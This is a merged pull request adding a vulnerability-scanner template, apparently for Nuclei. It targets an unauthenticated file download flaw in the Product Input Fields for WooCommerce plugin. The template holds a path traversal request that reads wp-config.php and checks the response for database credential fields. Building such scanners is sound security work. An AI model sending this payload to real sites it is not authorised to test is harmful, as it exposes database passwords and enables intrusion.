Merge pull request #2732 from Akokonunes/patch-38

Create product-input-fields-for-woocommerce-file-download.yaml

vulnerabilities/wordpress/wp-woocommerce-file-download.yaml

@@ -0,0 +1,29 @@
+id: wp-woocommerce-file-download
+
+info:
+  name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,woocommerce,lfi
+  description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
+  reference:
+    - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
+    - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200